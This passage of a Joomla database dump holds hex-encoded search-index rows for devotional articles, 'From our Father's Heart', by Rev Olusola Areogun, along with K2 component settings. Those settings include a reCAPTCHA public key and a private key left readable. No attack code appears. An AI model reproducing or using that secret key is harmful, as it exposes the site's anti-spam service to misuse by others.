52061747461636b73206f662074686520656e656d792e3c2f703e0d0a3c703e4974207761732073616964206f66205361756c20746861742c20e2809c4973205361756c20616c736f20616d6f6e67207468652070726f706865743fe2809d20486520776173206a75737420612070617274616b6572206f662074686174207370697269742e20446f6ee2809974206c657420796f757273206265206a75737420612076697369746174696f6e3b206c65742069742062652061206c6966657374796c652c20616e206f6e676f696e6720657870657269656e6365207769746820796f752e20416e6420736f6f6e2c20796f75722070726f70686563792077696c6c2068617070656e213c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30322d31322030373a33373a3030223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2236223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32373a2232303a666174686572732d68656172742d32392d30312d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34353a22636f6d706f6e656e742f6b322f6974656d2f32302d666174686572732d68656172742d32392d30312d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3230223b733a353a22726f757465223b733a36343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32303a666174686572732d68656172742d32392d30312d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832392f30312f3230313729223b733a31313a226465736372697074696f6e223b733a3235383a2220446561726c792062656c6f7665642c20596f75206d757374206f70657261746520696e2074686520676c6f72792062792070726f7068656379207468697320796561722e2054686973206973206120686f757365206f662070726f7068656369657320616e64207468657265206172652061206c6f7420616464656420756e746f20757320696e20746865206f6e676f696e6720383420646179732066617374696e6720616e6420707261796572732e20596f75206d757374207772617020796f7572206c6966652077697468207468656d20616e64206c6574207468656d2064656369646520796f757220657870657269656e63657320696e20323031372e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d32392031343a30343a3133223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d32392031343a30343a3133223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(257, 'index.php?option=com_k2&view=item&id=21', 'index.php?option=com_k2&view=item&id=21:from-our-father-s-heart-05-02-2017', 'From our Father\'s Heart (05/02/2017)', ' Dearly beloved, You must know how to sustain the presence of the Lord in your life. You may not know many things but if you keep the presence of God He will get you through. That was the secret of David. It was not David that killed Goliath, it was the presence of God that killed Goliath. How can a stone thrown by a boy kill a giant like that? David himself said the Lord that delivered me from the hand of the bear will deliver you into my hand. ', '2017-06-25 14:19:33', 'd04dc974b0b00333654e0f6222b2516b', 1, 1, 1, '*', '2017-02-05 21:30:00', '0000-00-00 00:00:00', '2017-02-05 21:30:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223231223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d30352d30322d32303137223b733a373a2273756d6d617279223b733a3436353a223c703e446561726c792062656c6f7665642c3c2f703e0d0a3c703e596f75206d757374206b6e6f7720686f7720746f207375737461696e207468652070726573656e6365206f6620746865204c6f726420696e20796f7572206c6966652e20596f75206d6179206e6f74206b6e6f77206d616e79207468696e67732062757420696620796f75206b656570207468652070726573656e6365206f6620476f642048652077696c6c2067657420796f75207468726f7567682e2054686174207761732074686520736563726574206f662044617669642e20497420776173206e6f742044617669642074686174206b696c6c656420476f6c696174682c20697420776173207468652070726573656e6365206f6620476f642074686174206b696c6c656420476f6c696174682e20486f772063616e20612073746f6e65207468726f776e206279206120626f79206b696c6c2061206769616e74206c696b6520746861743f2044617669642068696d73656c66207361696420746865204c6f726420746861742064656c697665726564206d652066726f6d207468652068616e64206f662074686520626561722077696c6c2064656c6976657220796f7520696e746f206d792068616e642e3c2f703e0d0a223b733a343a22626f6479223b733a323430333a220d0a3c703ec2a0497420776173206e6f742044616e69656c2c20536861647261636820616e6420416265646e65676f2074686174206b657074207468656d73656c7665732066726f6d20746865206c696f6e206f722074686520666972652c20697420776173207468652070726573656e6365206f6620476f642077697468207468656d2e20416e642074686174e2809973207468652070726573656e6365207468617420796f75206d757374207375737461696e207768657468657220796f752061726520612062616e6b6572206f7220796f7520617265206120686f75736577696665206f72206120627573696e657373206d616e20696e20323031372e204974206973204869732070726573656e63652074686174206973206f757220636f6d6d6f6e7765616c74682e205768656e20486520697320746865726520796f752063616e6e6f7420737566666572206c6f6e672c207768656e204865e280997320746865726520796f752063616e6e6f7420626520706f6f7220666f72206c6f6e672c207768656e204865e280997320746865726520796f752063616e6e6f74206265207369636b20666f72206c6f6e672e2054686174e2809973207768792074686520646576696c2077616e747320757320746f207472616465207468652070726573656e6365206f6620476f6420617761792e20596f7572206d617272696167652077696c6c206265206120706c61636520776865726520476f64e28099732070726573656e6365206973207265616c2ec2a03c2f703e0d0a3c703e446f6ee2809974206d65617375726520796f757273656c6620617320612076657279207374726f6e67206d616e206265636175736520796f752068617665206d6f6e65792c20616e6420646f6ee280997420626f617374206265636175736520796f75206b6e6f77206d616e792070656f706c652e204b657920746f207375636365737320696e20746865206a6f75726e6579206f66206c6966652069732077686f20697320676f696e67207769746820796f7520616e64206e6f7420686f772077656c6c20796f75206172652077616c6b696e672ec2a03c2f703e0d0a3c703e54686572652061726520736f206d616e79207468696e67732072657175697265642066726f6d20796f7520696620796f752077696c6c207375737461696e207468652070726573656e6365206f6620746865204c6f72642c20616e64204920686176652074616b656e2074696d6520746f206578706c61696e207468656d20646565706c7920696e206f6e65206f662074686520626f6f6b7320636f6d696e6720736f6f6e207469746c65642c205448452050524553454e4345204f4620474f442e204c69737465642062656c6f772061726520666577206f66207468656d3a3c2f703e0d0a3c756c3e0d0a3c6c693ec2a0426520626f726e20616761696e3a20c2a03c2f6c693e0d0a3c6c693ec2a05374617920617761792066726f6d2073696e3ac2a03c2f6c693e0d0a3c6c693ec2a0446f6ee2809974206576657220646f20616e797468696e6720746861742074686572652069732061207374727567676c6520696e20796f757220737069726974206f7665723c2f6c693e0d0a3c6c693ec2a0446f6ee28099742067657420696e766f6c76656420696e207468696e67732074686174206772696576652074686520686f6c79207370697269743c2f6c693e0d0a3c6c693ec2a054616b65206865656420746f20686f7720796f752068616e646c652061737369676e6d656e743c2f6c693e0d0a3c6c693ec2a0446f6ee280997420646f20707269766174656c79206f72207075626c69636c79207768617420676f642077696c6c206e6f742062652061626c6520746f207061727469636970617465207769746820796f7520696e3c2f6c693e0d0a3c6c693ec2a057726f6e672072656c6174696f6e736869707320696e20796f7572206c6966653c2f6c693e0d0a3c6c693ec2a05761746368207768617420636f6d6573206f7574206f6620796f7572206d6f7574683c2f6c693e0d0a3c6c693ec2a04265206120776f72736869707065723c2f6c693e0d0a3c6c693ec2a05265737065637420746865207468696e677320746861742068617320746f20646f2077697468207468652063616c6c696e6773206f6620676f6420696e20796f7572206c696665c2a03c2f6c693e0d0a3c6c693ec2a052656d61696e2062726f6b656e206865617274656420616e64207472656d626c652061742068697320776f7264733c2f6c693e0d0a3c6c693ec2a04c657420796f7572206f62656469656e63652062652074686f726f75676820616e6420636f6d706c6574653c2f6c693e0d0a3c6c693ec2a0446f6ee28099742065766572206265636f6d6520617368616d6564206f6620616e797468696e6720746861742064726177207468652070726573656e6365206f6620676f6420696e746f20796f7572206c6966653c2f6c693e0d0a3c6c693ec2a0446566696e65207468652061737369676e6d656e74207468617420676f642068617320636f6e6e656374656420746f20646576656c6f70696e6720796f7520666f7220796f75722064657374696e7920616e642074616b6520697420736572696f75732ec2a03c2f6c693e0d0a3c2f756c3e0d0a3c703e446f6ee280997420676574206f7574206f6620796f757220686f75736520696e20746865206d6f726e696e6720776974686f757420686176696e6720612064697363757373696f6e20776974682048696d2c20776974686f75742070757474696e6720796f7572206361736520696e204869732068616e64732e20546865204269626c6520736179732c2048652074686174206477656c6c65746820696e207468652073656372657420706c616365206f6620746865206d6f73742048696768207368616c6c20616269646520756e6465722074686520736861646f77206f662074686520416c6d69676874792e204869732070726573656e636520697320796f757220737472656e6774682e2045766572797468696e672063616e206661696c2061726f756e6420627574204869732070726573656e63652063726561746573206120736869656c6420666f7220796f752ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e6420e280a62e2e3c2f703e0d0a3c703e476f64e28099732073657276616e742c3c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e0d0a